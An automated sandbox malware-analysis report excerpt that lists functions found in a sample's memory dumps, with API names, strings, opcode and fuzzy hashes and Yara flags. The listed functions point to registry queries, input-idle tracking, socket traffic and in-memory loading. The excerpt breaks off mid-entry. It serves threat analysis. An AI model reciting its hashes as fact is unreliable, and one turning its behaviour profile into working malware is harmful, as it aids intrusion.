                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$_errno$CloseEnumInfoOpenQuery_invalid_parameter_noinfo
                          • String ID: Software\Tencent\Plugin\VAS
                          • API String ID: 47975445-3343197220
                          • Opcode ID: 6e061b802c5184f6ffb8d5e46668b4594c4fe4b6239176f7fbc9992a5fd39cfc
                          • Instruction ID: 2787a4e3cd5b5551586d1334af0b45850a457ca8bdfc8eb8addf31d67a3db36f
                          • Opcode Fuzzy Hash: 6e061b802c5184f6ffb8d5e46668b4594c4fe4b6239176f7fbc9992a5fd39cfc
                          • Instruction Fuzzy Hash: CC517236654BD285F720DB25E890BDE73B6F784748F50112ADA8D47A68DF38CB46CB40
                          Function 000001CFB960DB70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Window$CountForegroundInfoInputLastTextTickmallocwsprintf
                          • String ID: %d min
                          • API String ID: 4179731349-1947832151
                          • Opcode ID: 9b22214b862d139c1bff70a84ba118025456f4720a884c79d0e9ae2e001336b0
                          • Instruction ID: 1d0b25fe7401a3f08d995adefc0fee2952d6a2f24d146df43539a0bb4c246429
                          • Opcode Fuzzy Hash: 9b22214b862d139c1bff70a84ba118025456f4720a884c79d0e9ae2e001336b0
                          • Instruction Fuzzy Hash: A041A0322446D186FB649F25E494BDAB773F785B84F44413ADE4A47B85DB38CE06CB10
                          Function 000001CFB9608310 Relevance: 9.1, APIs: 6, Instructions: 71registrystringCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$OpenQueryValuelstrcmp
                          • String ID:
                          • API String ID: 4288439342-0
                          • Opcode ID: 6a09b4fa8d1f1f673de0ef9cf23ec804b22330cdbe4280648003b7661aad5db0
                          • Instruction ID: c9a5b0ccc7acd8205837f34a341d84df750aadbd4e4dcaab0f5380f890a806df
                          • Opcode Fuzzy Hash: 6a09b4fa8d1f1f673de0ef9cf23ec804b22330cdbe4280648003b7661aad5db0
                          • Instruction Fuzzy Hash: 1E319131358AC181FB60DB15E8C4B9AB372F7D5B94F401239AA5D43B99DF39CA46CB04
                          Function 000001CFB96122D0 Relevance: 9.1, APIs: 6, Instructions: 63threadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateErrorLastThread_errno_getptd_invalid_parameter_noinfofree
                          • String ID:
                          • API String ID: 3283625137-0
                          • Opcode ID: 72025f16065156c1a411d32745b6a8ceab2b3ea3d3236370eb3e3b3478fac157
                          • Instruction ID: 4b75fc62a2158abce137ca205ed582f5f2eda2c306d0a0ebd8231fe16fe4b698
                          • Opcode Fuzzy Hash: 72025f16065156c1a411d32745b6a8ceab2b3ea3d3236370eb3e3b3478fac157
                          • Instruction Fuzzy Hash: EE216D352407D186FA14AB66E841BDAB3B3B784BA0F445639AF6943796CF38CA528700
                          Function 000001CFB9393690 Relevance: 7.6, APIs: 5, Instructions: 109networkCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _errno$recvselect
                          • String ID:
                          • API String ID: 4102763267-0
                          • Opcode ID: 9845bbeb49fb392f0077708386112e1cb0e8a4c98ec056f0ebe1f442da0f05b8
                          • Instruction ID: 664a0e798b5f04a61102ebf797919f7716a55c80de6406fa78aca3e3c9533773
                          • Opcode Fuzzy Hash: 9845bbeb49fb392f0077708386112e1cb0e8a4c98ec056f0ebe1f442da0f05b8
                          • Instruction Fuzzy Hash: A43110B0258A848FF7A5EF28C495BAA73E6FF84305F1C467DA44BC7192DB348D428746
                          Function 000001CFB93994DC Relevance: 7.6, APIs: 5, Instructions: 98threadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: CreateThread_errno_getptd_invalid_parameter_noinfofree
                          • String ID:
                          • API String ID: 2643549960-0
                          • Opcode ID: a6b047b9ba05778c913bae5aa75a3fa791de028973cf7ce0c6a1d43e90da30c7
                          • Instruction ID: 23f5d76224ffe9b6c26a84966cbed2f4b0f56de1e3b714d084caadf0691140b2
                          • Opcode Fuzzy Hash: a6b047b9ba05778c913bae5aa75a3fa791de028973cf7ce0c6a1d43e90da30c7
                          • Instruction Fuzzy Hash: 5C218C30248B494FFB44BB68D456BAA77E5EF94310F18063EA45EC32A3DB60DD428792
                          Function 000001CFB960EE20 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 196registryCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEnumInfoQueryValue_callnewhmallocstd::exception::exception
                          • String ID: t1:
                          • API String ID: 1242514309-2900936606
                          • Opcode ID: fede6cdfeb807d385ee5abbfcf2e1eb580fa302d2ae75469db10d5a0f1743a1d
                          • Instruction ID: 3272456a813a4d2b01304d3e8b2b48808432ec3700241a932da8f278aa45085f
                          • Opcode Fuzzy Hash: fede6cdfeb807d385ee5abbfcf2e1eb580fa302d2ae75469db10d5a0f1743a1d
                          • Instruction Fuzzy Hash: 38916C32741B8189EB40DF69E894B9973B6F788794F11413AAA5D87BA4DF34CA52C300
                          Function 000001CFB960CA70 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59registryCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: OpenQueryValue
                          • String ID: Console$IpDatespecial
                          • API String ID: 4153817207-1840232981
                          • Opcode ID: 22fc0a0dece14184706e6fb6e5bb7c82227ebf9c7fbc1b7f67f3996ba3476d1f
                          • Instruction ID: 81e4fd21d15a3af9ecdd3d183c772c3fb12f702d94dd46edfb3f01074707e2a1
                          • Opcode Fuzzy Hash: 22fc0a0dece14184706e6fb6e5bb7c82227ebf9c7fbc1b7f67f3996ba3476d1f
                          • Instruction Fuzzy Hash: F221A432648AD199F3209BA1E480BDD7776F34879CF844126DE8C13A98DB38C65AC704
                          Function 000001CFB9311BF1 Relevance: 6.1, APIs: 4, Instructions: 133memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112008325.000001CFB9300000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9300000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ProtectVirtual$LibraryLoad
                          • String ID:
                          • API String ID: 895956442-0
                          • Opcode ID: 48f3a983b865309274dfddc27b08f5c66236fb7a43ce97e016cebd4c856a8b9f
                          • Instruction ID: 93da2f63c02c1300ea4fcb21a34ad9b197faaa0477af91c1116ddcd5e1ba186d
                          • Opcode Fuzzy Hash: 48f3a983b865309274dfddc27b08f5c66236fb7a43ce97e016cebd4c856a8b9f
                          • Instruction Fuzzy Hash: 8B31B63130CA184BE758AA5CD8457FA73EAEBC4321F18413DA84BC72D6DE60DE0746C1
                          Function 000001CFB9609A50 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandleProcess$FileImageNameOpen
                          • String ID:
                          • API String ID: 93767460-0
                          • Opcode ID: e5835fa6602d2fc698d6210b0ee50ff401511b4d9772e348674df1cf25f15e26
                          • Instruction ID: f47f5164d5f692e18bbe98eb26f78260f4bd33ade4ea423158c4bda0f2fa9760
                          • Opcode Fuzzy Hash: e5835fa6602d2fc698d6210b0ee50ff401511b4d9772e348674df1cf25f15e26
                          • Instruction Fuzzy Hash: C41184753546C281FF249B25E4D879A62B3BB98BC4F44403E8E4947386EF3CCA46C700
                          Function 000001CFB9603300 Relevance: 6.0, APIs: 4, Instructions: 26COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CancelEventclosesocketsetsockopt
                          • String ID:
                          • API String ID: 852421847-0
                          • Opcode ID: 652c7e3dd81a5322d9837539c46bb1ede8e7bbe065106b81e455553d895865ab
                          • Instruction ID: 0b23eb3cb3c52e9bd3409543aea26d9ecad7711a67d48cea0e6a6d3c510f93dd
                          • Opcode Fuzzy Hash: 652c7e3dd81a5322d9837539c46bb1ede8e7bbe065106b81e455553d895865ab
                          • Instruction Fuzzy Hash: 2FF03C36201AC1C3E7249F25E55879AB332F785BA4F60433ADBA907BE4CF39C5668701
                          Function 000001CFB93980E0 Relevance: 4.7, APIs: 3, Instructions: 216COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: Sleep$_errno$_invalid_parameter_noinfomalloc
                          • String ID:
                          • API String ID: 3746343157-0
                          • Opcode ID: a0bf53fd14b18baa06dae27eec97fe0d1a6922e2a394531e4f28ced092993dc4
                          • Instruction ID: 64b23afb6dd4bba10de44fa948927357136ff99c4deeede422d3597ba9333265
                          • Opcode Fuzzy Hash: a0bf53fd14b18baa06dae27eec97fe0d1a6922e2a394531e4f28ced092993dc4
                          • Instruction Fuzzy Hash: FA715F312546498FF754EF28D895BE977A6FB89300F58452EE44BC31A2DB38DE42C782
                          Function 000001CFB9396682 Relevance: 4.6, APIs: 3, Instructions: 110registryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: Value$DeleteOpen
                          • String ID:
                          • API String ID: 821670891-0
                          • Opcode ID: 5b51d0f07fe2ec2a12fe00e65f7005416d701acb93c52f3d52654ca2c179eb4d
                          • Instruction ID: 23b183deb0cd08d989852096b653ae418e16cec97732cf8baa8a0b2e77119578
                          • Opcode Fuzzy Hash: 5b51d0f07fe2ec2a12fe00e65f7005416d701acb93c52f3d52654ca2c179eb4d
                          • Instruction Fuzzy Hash: B9313E306487488FF748EB28D858BDA77E6FF84345F584A2DE156C22A4DB38C985CB41
                          Function 00007FF6F6083A57 Relevance: 4.6, APIs: 3, Instructions: 105COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4113640461.00007FF6F6081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6F6080000, based on PE: true
                          • Associated: 00000000.00000002.4113613717.00007FF6F6080000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F6089000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F6362000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F636B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.4113640461.00007FF6F679E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff6f6080000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: __scrt_acquire_startup_lock__scrt_get_show_window_mode__scrt_release_startup_lock
                          • String ID:
                          • API String ID: 1152625263-0
                          • Opcode ID: 61287d11c25f32e521161f209feba58a36412df61d1ac03f0bb13480fc72a213
                          • Instruction ID: e50d4d6f512934eff736806c8e7b319826e98d95d9daa145d5dbdc6909f6153a
                          • Opcode Fuzzy Hash: 61287d11c25f32e521161f209feba58a36412df61d1ac03f0bb13480fc72a213
                          • Instruction Fuzzy Hash: CB416820E0C64341FB58EBB5A6523B92289AFD1344F685435DA7EC72F3FE6FA8458301
                          Function 000001CFB960B6D0 Relevance: 4.5, APIs: 3, Instructions: 31COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalSection$EnterGdiplusLeaveStartup
                          • String ID:
                          • API String ID: 389129658-0
                          • Opcode ID: 33b4bd6e2f87f441e3fd96ec6b98b4ecf2029651f8cca78304b2f89041d54879
                          • Instruction ID: d045182b68ae283567d840be811d266e9d96c8c73bcbf4cf2e286fb110a7f44d
                          • Opcode Fuzzy Hash: 33b4bd6e2f87f441e3fd96ec6b98b4ecf2029651f8cca78304b2f89041d54879
                          • Instruction Fuzzy Hash: ED011A35548BC382FB449F15E9807D973B7F7A0745F84412AD586425A4CF7CCA5ACB00
                          Function 000001CFB93144A1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104libraryCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112008325.000001CFB9300000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9300000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: LibraryLoad
                          • String ID: l
                          • API String ID: 1029625771-2517025534
                          • Opcode ID: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
                          • Instruction ID: f9abdee970300a051bfe49d4d337b643c96764b205d409c2dc0e270cb449ac9e
                          • Opcode Fuzzy Hash: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
                          • Instruction Fuzzy Hash: BF319030558AD58FF795DB28C048B66BBE9FFA9308F2856BC90DAC71A2D720D9078701
                          Function 000001CFB95B00DC Relevance: 3.4, APIs: 2, Instructions: 391memorylibraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocLibraryLoadVirtual
                          • String ID:
                          • API String ID: 3550616410-0
                          • Opcode ID: 22a59f860d870a6bcf201ec3191bb530606b5caa03c236b8628a20c22f198a64
                          • Instruction ID: a9380a58562cd1c127dec311cf09ed45d6d0ef8b85a371664be19f28d08e0e13
                          • Opcode Fuzzy Hash: 22a59f860d870a6bcf201ec3191bb530606b5caa03c236b8628a20c22f198a64
                          • Instruction Fuzzy Hash: 86C1E334294A4A8BEB689E68C9C4BB5B3E1FB55301F14413DD88AC3285EB74ED92C7D1
                          Function 000001CFB9603A50 Relevance: 3.1, APIs: 2, Instructions: 66networkCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: send
                          • String ID:
                          • API String ID: 2809346765-0
                          • Opcode ID: e5b400f1e4516aa0803fed4f772d5bd127400e170aad474a78b21ea62f3b727e
                          • Instruction ID: 81fc3fcae6218fa73c49dedffcf286af3f969f9d1bf2827c0f44c5dc7452ed30
                          • Opcode Fuzzy Hash: e5b400f1e4516aa0803fed4f772d5bd127400e170aad474a78b21ea62f3b727e
                          • Instruction Fuzzy Hash: BB210832640AC242F3604B12F8C4F9A76B2F798BD8F04113AEF1943B91E775C9438308
                          Function 000001CFB9311D1D Relevance: 3.1, APIs: 2, Instructions: 63memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112008325.000001CFB9300000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9300000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ProtectVirtual$LibraryLoad
                          • String ID:
                          • API String ID: 895956442-0
                          • Opcode ID: 59fb7dff92b0f7852036e505a9d953d2edd625376deed43e8a97f635c863a1ff
                          • Instruction ID: 3d19a9cf5b630499a95d16716c89753d7244cc6b655eabde962a81af49a42544
                          • Opcode Fuzzy Hash: 59fb7dff92b0f7852036e505a9d953d2edd625376deed43e8a97f635c863a1ff
                          • Instruction Fuzzy Hash: 3C11AC31358A584BDB94EB18D485BBA73E5FFD8340F18457DAC4AC7255DF20DE428781
                          Function 000001CFB9398650 Relevance: 3.1, APIs: 2, Instructions: 58memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: CreateHeapfree
                          • String ID:
                          • API String ID: 2345683253-0
                          • Opcode ID: 1de35667c4491ff6d1491348858e0d4b0818fad769f9b683ab588cdfd6fe5441
                          • Instruction ID: 2a3fc90452aaa157d4c6fdbfec6b9e10f6af05aad1c335ce5f56b88048700977
                          • Opcode Fuzzy Hash: 1de35667c4491ff6d1491348858e0d4b0818fad769f9b683ab588cdfd6fe5441
                          • Instruction Fuzzy Hash: 471113B0918A188FEB94DF18D4C47517BE9EF48704F6445AEA909CB25AC770C982CBC0
                          Function 000001CFB9398580 Relevance: 3.0, APIs: 2, Instructions: 48threadwindowCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: Thread$CreateMessagePost_wcsrev
                          • String ID:
                          • API String ID: 4143106411-0
                          • Opcode ID: 152ae417eb4b62f33c842a60702934fe7b1e65802cfc5c2bd98c8d5dbe26bc31
                          • Instruction ID: 644c876923fc3839e3081e635f1a6e119649b2cc86a67ef9779c126950a60409
                          • Opcode Fuzzy Hash: 152ae417eb4b62f33c842a60702934fe7b1e65802cfc5c2bd98c8d5dbe26bc31
                          • Instruction Fuzzy Hash: FB015E707145058FE728EF74EC5D1797BE2FB89312B41863AA457C29B0DF384501AA42
                          Function 000001CFB960F170 Relevance: 3.0, APIs: 2, Instructions: 41memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateHeapfree
                          • String ID:
                          • API String ID: 2345683253-0
                          • Opcode ID: 2e347fcba473973204389cff578f1acf52d540e9d7daa0cdd23c5056874622e4
                          • Instruction ID: 9d9def22907ed83a69a16c5995359aecff173e859daabc987558a1e77cb2bf66
                          • Opcode Fuzzy Hash: 2e347fcba473973204389cff578f1acf52d540e9d7daa0cdd23c5056874622e4
                          • Instruction Fuzzy Hash: A1117CB25217A0C6F744CF28E48074937BAF748F48F25512AEB4957758CB78C882CB80
                          Function 000001CFB9393310 Relevance: 3.0, APIs: 2, Instructions: 39COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: closesocketsetsockopt
                          • String ID:
                          • API String ID: 553142124-0
                          • Opcode ID: 77c2693313518921cd1b9c8efffd3d9e865a5c66b2e60eb56a87be25d9ebaed2
                          • Instruction ID: b6a2d4a08e4454521ba372f46659c5deb02d7b25398f81e5b88216843b30245d
                          • Opcode Fuzzy Hash: 77c2693313518921cd1b9c8efffd3d9e865a5c66b2e60eb56a87be25d9ebaed2
                          • Instruction Fuzzy Hash: 5F016D70218A458FE744DF68D848B96B7B1FF88315F50432CE15EC72A0CB399851CB82
                          Function 000001CFB96037D0 Relevance: 3.0, APIs: 2, Instructions: 37sleeptimeCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: SleepTimetime
                          • String ID:
                          • API String ID: 346578373-0
                          • Opcode ID: 77ee5b6c6589e47e27a32890b617e9f8f43f170f7971284fab1d9a22a6fd6b20
                          • Instruction ID: 0366515f04396daf1f795fe5a3331b6d2afb58c076d7cdbcb15862639839c492
                          • Opcode Fuzzy Hash: 77ee5b6c6589e47e27a32890b617e9f8f43f170f7971284fab1d9a22a6fd6b20
                          • Instruction Fuzzy Hash: 0A01D8326046C187F7648B24D2C4BAC3773F348B45F000239C75603AD0CB78CAA6C705
                          Function 000001CFB9610D30 Relevance: 3.0, APIs: 2, Instructions: 20synchronizationthreadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateObjectSingleThreadWait
                          • String ID:
                          • API String ID: 1891408510-0
                          • Opcode ID: 7b0bb7bbe43155a50ef1fbcb0573ed9ed8b30bcd02ad1d16f7930aff955f32ce
                          • Instruction ID: 1a29e55741400fa244ce2a8a784ce43b754cc4e6b02f395edd03a1b006118207
                          • Opcode Fuzzy Hash: 7b0bb7bbe43155a50ef1fbcb0573ed9ed8b30bcd02ad1d16f7930aff955f32ce
                          • Instruction Fuzzy Hash: 8EE0ED31D45AC286FB619B74EC45BC532F3F795328F90523E9499422A4EF3CCA568644
                          Function 000001CFB9391080 Relevance: 2.7, APIs: 2, Instructions: 163memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: 94c7016ab2636b5593df99f46c9914e648a045f6aa69c007a8dbfde07d768e9c
                          • Instruction ID: 3724752795a1d1267f686d2e9d5378f2a3140d69735bbc6a8b51b58cfc26dfa1
                          • Opcode Fuzzy Hash: 94c7016ab2636b5593df99f46c9914e648a045f6aa69c007a8dbfde07d768e9c
                          • Instruction Fuzzy Hash: D041F630658A884BEB4C9E5CD44277573E6FBC9305F28826EE84AC724ADB30DD53CB81
                          Function 000001CFB93911F0 Relevance: 2.6, APIs: 2, Instructions: 90memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
